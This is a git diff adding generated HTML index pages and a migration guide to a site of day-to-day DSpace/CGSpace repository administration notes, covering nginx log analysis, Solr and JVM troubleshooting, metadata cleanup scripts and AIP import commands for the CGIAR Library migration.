# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
+106781
+
+ Read more → +
+ + + + + + +
+
+

October, 2019

+ +
+ 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unnecessary Unicode” fix: $ csvcut -c 'id,dc.
+ + + + + + +
+
+

September, 2019

+ +
+

2019-09-01

+
    +
  • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
  • +
  • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+
+ Read more → +
+ + + + + + +
+
+

August, 2019

+ +
+

2019-08-03

+
    +
  • Look at Bioversity’s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name…
  • +
+

2019-08-04

+
    +
  • Deploy ORCID identifier updates requested by Bioversity to CGSpace
  • +
  • Run system updates on CGSpace (linode18) and reboot it +
      +
    • Before updating it I checked Solr and verified that all statistics cores were loaded properly…
    • +
    • After rebooting, all statistics cores were loaded… wow, that’s lucky.
    • +
    +
  • +
  • Run system updates on DSpace Test (linode19) and reboot it
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/notes/page/6/index.html b/docs/categories/notes/page/6/index.html new file mode 100644 index 000000000..98e3c82e8 --- /dev/null +++ b/docs/categories/notes/page/6/index.html @@ -0,0 +1,473 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

July, 2019

+ +
+

2019-07-01

+
    +
  • Create an “AfricaRice books and book chapters” collection on CGSpace for AfricaRice
  • +
  • Last month Sisay asked why the following “most popular” statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace: + +
  • +
  • Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

May, 2019

+ +
+

2019-05-01

+
    +
  • Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace
  • +
  • A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items +
      +
    • Apparently if the item is in the workflowitem table it is submitted to a workflow
    • +
    • And if it is in the workspaceitem table it is in the pre-submitted state
    • +
    +
  • +
  • The item seems to be in a pre-submitted state, so I tried to delete it from there:
  • +
+
dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+
    +
  • But after this I tried to delete the item from the XMLUI and it is still present…
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2019

+ +
+

2019-04-01

+
    +
  • Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc +
      +
    • They asked if we had plans to enable RDF support in CGSpace
    • +
    +
  • +
  • There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today +
      +
    • I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!
    • +
    +
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+
    +
  • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
  • +
  • Apply country and region corrections and deletions on DSpace Test and CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
+
+ Read more → +
+ + + + + + +
+
+

March, 2019

+ +
+

2019-03-01

+
    +
  • I checked IITA’s 259 Feb 14 records from last month for duplicates using Atmire’s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good
  • +
  • I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc…
  • +
  • Looking at the other half of Udana’s WLE records from 2018-11 +
      +
    • I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)
    • +
    • I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items
    • +
    • Most worryingly, there are encoding errors in the abstracts for eleven items, for example:
    • +
    • 68.15% � 9.45 instead of 68.15% ± 9.45
    • +
    • 2003�2013 instead of 2003–2013
    • +
    +
  • +
  • I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2019

+ +
+

2019-02-01

+
    +
  • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
  • +
  • The top IPs before, during, and after this latest alert tonight were:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+
    +
  • 85.25.237.71 is the “Linguee Bot” that I first saw last month
  • +
  • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
  • +
  • There were just over 3 million accesses in the nginx logs last month:
  • +
+
# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+
+ Read more → +
+ + + + + + +
+
+

January, 2019

+ +
+

2019-01-02

+
    +
  • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
  • +
  • I don’t see anything interesting in the web server logs around that time though:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+
+ Read more → +
+ + + + + + +
+
+

December, 2018

+ +
+

2018-12-01

+
    +
  • Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK
  • +
  • I manually installed OpenJDK, then removed Oracle JDK, then re-ran the Ansible playbook to update all configuration files, etc
  • +
  • Then I ran all system updates and restarted the server
  • +
+

2018-12-02

+ + Read more → +
+ + + + + + +
+
+

November, 2018

+ +
+

2018-11-01

+
    +
  • Finalize AReS Phase I and Phase II ToRs
  • +
  • Send a note about my dspace-statistics-api to the dspace-tech mailing list
  • +
+

2018-11-03

+
    +
  • Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
  • +
  • Today these are the top 10 IPs:
  • +
+ Read more → +
+ + + + + + +
+
+

October, 2018

+ +
+

2018-10-01

+
    +
  • Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
  • +
  • I created a GitHub issue to track this #389, because I’m super busy in Nairobi right now
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/notes/page/7/index.html b/docs/categories/notes/page/7/index.html new file mode 100644 index 000000000..2d175907c --- /dev/null +++ b/docs/categories/notes/page/7/index.html @@ -0,0 +1,482 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

September, 2018

+ +
+

2018-09-02

+
    +
  • New PostgreSQL JDBC driver version 42.2.5
  • +
  • I’ll update the DSpace role in our Ansible infrastructure playbooks and run the updated playbooks on CGSpace and DSpace Test
  • +
  • Also, I’ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system’s RAM, and we never re-ran them after migrating to larger Linodes last month
  • +
  • I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I’m getting those autowire errors in Tomcat 8.5.30 again:
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2018

+ +
+

2018-08-01

+
    +
  • DSpace Test had crashed at some point yesterday morning and I see the following in dmesg:
  • +
+
[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight
  • +
  • From the DSpace log I see that eventually Solr stopped responding, so I guess the java process that was OOM killed above was Tomcat’s
  • +
  • I’m not sure why Tomcat didn’t crash with an OutOfMemoryError…
  • +
  • Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core
  • +
  • The server only has 8GB of RAM so we’ll eventually need to upgrade to a larger one because we’ll start starving the OS, PostgreSQL, and command line batch processes
  • +
  • I ran all system updates on DSpace Test and rebooted it
  • +
+ Read more → +
+ + + + + + +
+
+

July, 2018

+ +
+

2018-07-01

+
    +
  • I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:
  • +
+
$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+
    +
  • During the mvn package stage on the 5.8 branch I kept getting issues with java running out of memory:
  • +
+
There is insufficient memory for the Java Runtime Environment to continue.
+
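When the limit is the JVM heap rather than the operating system itself running out of memory, giving Maven a larger heap sometimes helps; the value here is only an example:
+
$ export MAVEN_OPTS="-Xmx1024m"
+$ mvn clean package
+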
+ Read more → +
+ + + + + + +
+
+

June, 2018

+ +
+

2018-06-04

+
    +
  • Test the DSpace 5.8 module upgrades from Atmire (#378) +
      +
    • There seems to be a problem with the CUA and L&R versions in pom.xml because they are using SNAPSHOT and it doesn’t build
    • +
    +
  • +
  • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
  • +
  • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
+
    +
  • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
  • +
  • Time to index ~70,000 items on CGSpace:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+
+ Read more → +
+ + + + + + +
+
+

May, 2018

+ +
+

2018-05-01

+
    +
  • I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface (curl equivalents are sketched after this list): +
      +
    • http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E
    • +
    • http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
    • +
    +
  • +
  • Then I reduced the JVM heap size from 6144 back to 5120m
  • +
  • Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
  • +
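For reference, the curl equivalents of those two admin-interface URLs are simply:
+
$ curl 'http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E'
+$ curl 'http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E'
+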
+ Read more → +
+ + + + + + +
+
+

April, 2018

+ +
+

2018-04-01

+
    +
  • I tried to test something on DSpace Test but noticed that it’s down since god knows when
  • +
  • Catalina logs at least show some memory errors yesterday:
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2018

+ +
+

2018-03-02

+
    +
  • Export a CSV of the IITA community metadata for Martin Mueller
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2018

+ +
+

2018-02-01

+
    +
  • Peter gave feedback on the dc.rights proof of concept that I had sent him last week
  • +
  • We don’t need to distinguish between internal and external works, so that makes it just a simple list
  • +
  • Yesterday I figured out how to monitor DSpace sessions using JMX
  • +
  • I copied the logic in the jmx_tomcat_dbpools plugin provided by Ubuntu’s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2018

+ +
+

2018-01-02

+
    +
  • Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time
  • +
  • I didn’t get any load alerts from Linode and the REST and XMLUI logs don’t show anything out of the ordinary
  • +
  • The nginx logs show HTTP 200s until 02/Jan/2018:11:27:17 +0000 when Uptime Robot got an HTTP 500
  • +
  • In dspace.log around that time I see many errors like “Client closed the connection before file download was complete”
  • +
  • And just before that I see this:
  • +
+
Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+
    +
  • Ah hah! So the pool was actually empty!
  • +
  • I need to increase that, let’s try to bump it up from 50 to 75
  • +
  • After that one client got an HTTP 499 but then the rest were HTTP 200, so I don’t know what the hell Uptime Robot saw
  • +
  • I notice this error quite a few times in dspace.log:
  • +
+
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
+
    +
  • And there are many of these errors every day for the past month:
  • +
+
$ grep -c "Error while searching for sidebar facets" dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+
    +
  • Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let’s Encrypt if it’s just a handful of domains
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2017

+ +
+

2017-12-01

+
    +
  • Uptime Robot noticed that CGSpace went down
  • +
  • The logs say “Timeout waiting for idle object”
  • +
  • PostgreSQL activity says there are 115 connections currently
  • +
  • The list of connections to XMLUI and REST API for today:
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/notes/page/8/index.html b/docs/categories/notes/page/8/index.html new file mode 100644 index 000000000..0c489ffc4 --- /dev/null +++ b/docs/categories/notes/page/8/index.html @@ -0,0 +1,237 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + +
+
+

November, 2017

+ +
+

2017-11-01

+
    +
  • The CORE developers responded to say they are looking into their bot not respecting our robots.txt
  • +
+

2017-11-02

+
    +
  • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
  • +
+
# grep -c "CORE" /var/log/nginx/access.log
+0
+
    +
  • Generate list of authors on CGSpace for Peter to go through and correct:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+
+ Read more → +
+ + + + + + +
+
+

October, 2017

+ +
+

2017-10-01

+ +
http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+
    +
  • There appears to be a pattern but I’ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
  • +
  • Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
  • +
+ Read more → +
+ + + + + + +
+
+

CGIAR Library Migration

+ +
+

Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called CGIAR System Organization.

+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/categories/page/1/index.html b/docs/categories/page/1/index.html new file mode 100644 index 000000000..7cf6bb00c --- /dev/null +++ b/docs/categories/page/1/index.html @@ -0,0 +1,10 @@ + + + + https://alanorth.github.io/cgspace-notes/categories/ + + + + + + diff --git a/docs/cgiar-library-migration/index.html b/docs/cgiar-library-migration/index.html new file mode 100644 index 000000000..65d912cfd --- /dev/null +++ b/docs/cgiar-library-migration/index.html @@ -0,0 +1,336 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGIAR Library Migration | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

CGIAR Library Migration

+ +
+

Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called CGIAR System Organization.

+

Pre-migration Technical TODOs

+

Things that need to happen before the migration:

+
    +
  • Create top-level community on CGSpace to hold the CGIAR Library content: 10568/83389 +
      +
    • Update nginx redirects in ansible templates
    • +
    • Update handle in DSpace XMLUI config
    • +
    +
  • +
  • Set up nginx redirects for URLs like: + +
  • +
  • Merge #339 to 5_x-prod branch and rebuild DSpace
  • +
  • Increase max_connections in /etc/postgresql/9.5/main/postgresql.conf by ~10 +
      +
    • SELECT * FROM pg_stat_activity; seems to show ~6 extra connections used by the command line tools during import
    • +
    +
  • +
  • Temporarily disable nightly index-discovery cron job because the import process will be taking place during some of this time and I don’t want them to be competing to update the Solr index
  • +
  • Copy HTTPS certificate key pair from CGIAR Library server’s Tomcat keystore:
  • +
+
$ keytool -list -keystore tomcat.keystore
+$ keytool -importkeystore -srckeystore tomcat.keystore -destkeystore library.cgiar.org.p12 -deststoretype PKCS12 -srcalias tomcat
+$ openssl pkcs12 -in library.cgiar.org.p12 -nokeys -out library.cgiar.org.crt.pem
+$ openssl pkcs12 -in library.cgiar.org.p12 -nodes -nocerts -out library.cgiar.org.key.pem
+$ wget https://certs.godaddy.com/repository/gdroot-g2.crt https://certs.godaddy.com/repository/gdig2.crt.pem
+$ cat library.cgiar.org.crt.pem gdig2.crt.pem > library.cgiar.org-chained.pem
+

Migration Process

+

Export all top-level communities and collections from DSpace Test:

+
$ export PATH=$PATH:/home/dspacetest.cgiar.org/bin
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2515 10947-2515/10947-2515.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2516 10947-2516/10947-2516.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2517 10947-2517/10947-2517.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2518 10947-2518/10947-2518.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2519 10947-2519/10947-2519.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2708 10947-2708/10947-2708.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2526 10947-2526/10947-2526.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2871 10947-2871/10947-2871.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2527 10947-2527/10947-2527.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10568/93759 10568-93759/10568-93759.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10568/93760 10568-93760/10568-93760.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/1 10947-1/10947-1.zip
+

Import to CGSpace (also see notes from 2017-05-10):

+
    +
  • Copy all exports from DSpace Test
  • +
  • Add ingestion overrides to dspace.cfg before import:
  • +
+
mets.dspaceAIP.ingest.crosswalk.METSRIGHTS = NIL
+mets.dspaceAIP.ingest.crosswalk.DSPACE-ROLES = NIL
+
    +
  • Import communities and collections, paying attention to options to skip missing parents and ignore handles:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
+$ export PATH=$PATH:/home/cgspace.cgiar.org/bin
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2515/10947-2515.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2516/10947-2516.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2517/10947-2517.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2518/10947-2518.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2519/10947-2519.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2708/10947-2708.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2526/10947-2526.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2871/10947-2871.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-4467/10947-4467.zip
+$ dspace packager -s -u -t AIP -o ignoreHandle=false -e aorth@mjanja.ch -p 10568/83389 10947-2527/10947-2527.zip
+$ for item in 10947-2527/ITEM@10947-*; do dspace packager -r -f -u -t AIP -e aorth@mjanja.ch $item; done
+$ dspace packager -s -t AIP -o ignoreHandle=false -e aorth@mjanja.ch -p 10568/83389 10947-1/10947-1.zip
+$ for collection in 10947-1/COLLECTION@10947-*; do dspace packager -s -o ignoreHandle=false -t AIP -e aorth@mjanja.ch -p 10947/1 $collection; done
+$ for item in 10947-1/ITEM@10947-*; do dspace packager -r -f -u -t AIP -e aorth@mjanja.ch $item; done
+

This submits AIP hierarchies recursively (-r) and suppresses errors when an item’s parent collection hasn’t been created yet—for example, if the item is mapped. The large historic archive (10947/1) is created in several steps because it requires a lot of memory and often crashes.

+

Create new subcommunities and collections for content we reorganized into new hierarchies from the original:

+
    +
  • Create CGIAR System Management Board sub-community: 10568/83536 +
      +
    • Content from CGIAR System Management Board documents collection (10947/4561) goes here
    • +
    • Import collection hierarchy first and then the items:
    • +
    +
  • +
+
$ dspace packager -r -t AIP -o ignoreHandle=false -e aorth@mjanja.ch -p 10568/83536 10568-93760/COLLECTION@10947-4651.zip
+$ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e aorth@mjanja.ch $item; done
+
    +
  • Create CGIAR System Management Office sub-community: 10568/83537 +
      +
    • Create CGIAR System Management Office documents collection: 10568/83538
    • +
    • Import items to collection individually in replace mode (-r) while explicitly preserving handles and ignoring parents:
    • +
    +
  • +
+
$ for item in 10568-93759/ITEM@10947-46*; do dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/83538 $item; done
+

Get the handles for the last few items from CGIAR Library that were created since we did the migration to DSpace Test in May:

+
dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
+
    +
  • Export them from the CGIAR Library:
  • +
+
# for handle in 10947/4658 10947/4659 10947/4660 10947/4661 10947/4665 10947/4664 10947/4666 10947/4669; do /usr/local/dspace/bin/dspace packager -d -a -t AIP -e m.marus@cgiar.org -i $handle ${handle}.zip; done
+
    +
  • Import on CGSpace:
  • +
+
$ for item in 10947-latest/*.zip; do dspace packager -r -u -t AIP -e aorth@mjanja.ch $item; done
+

Post Migration

+
    +
  • Shut down Tomcat and run update-sequences.sql as the system’s postgres user
  • +
  • Remove ingestion overrides from dspace.cfg
  • +
  • Reset PostgreSQL max_connections to 183
  • +
  • Enable nightly index-discovery cron job
  • +
  • Adjust CGSpace’s handle-server/config.dct to add the new prefix alongside our existing 10568, ie:
  • +
+
"server_admins" = (
+"300:0.NA/10568"
+"300:0.NA/10947"
+)
+
+"replication_admins" = (
+"300:0.NA/10568"
+"300:0.NA/10947"
+)
+
+"backup_admins" = (
+"300:0.NA/10568"
+"300:0.NA/10947"
+)
+

I had regenerated the sitebndl.zip file on the CGIAR Library server and sent it to the Handle.net admins, but they said that there were mismatches between the public and private keys, which I suspect is due to make-handle-config not being very flexible. After discussing our scenario with the Handle.net admins they said we actually don’t need to send an updated sitebndl.zip for this type of change, and the above config.dct edits are all that is required. I guess they just did something on their end by setting the authoritative IP address for the 10947 prefix to be the same as ours…

+
    +
  • Update DNS records: +
      +
    • CNAME: cgspace.cgiar.org
    • +
    +
  • +
  • Re-deploy DSpace from freshly built 5_x-prod branch
  • +
  • Merge cgiar-library branch to master and re-run ansible nginx templates
  • +
  • Run system updates and reboot server
  • +
  • Switch to Let’s Encrypt HTTPS certificates (after DNS is updated and server isn’t busy):
  • +
+
$ sudo systemctl stop nginx
+$ /opt/certbot-auto certonly --standalone -d library.cgiar.org
+$ sudo systemctl start nginx
+

Troubleshooting

+

Foreign Key Error in dspace cleanup

+

The cleanup script is sometimes used during import processes to clean the database and assetstore after failed AIP imports. If you see the following error with dspace cleanup -v:

+
Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"                                                                                                                       
+  Detail: Key (bitstream_id)=(119841) is still referenced from table "bundle".
+

The solution is to set the primary_bitstream_id to NULL in PostgreSQL:

+
dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (119841);
+

PSQLException During AIP Ingest

+

After a few rounds of ingesting—possibly with failures—you might end up with inconsistent IDs in the database. In this case, during AIP ingest of a single collection in submit mode (-s):

+
org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"                                    
+  Detail: Key (handle_id)=(86227) already exists.
+

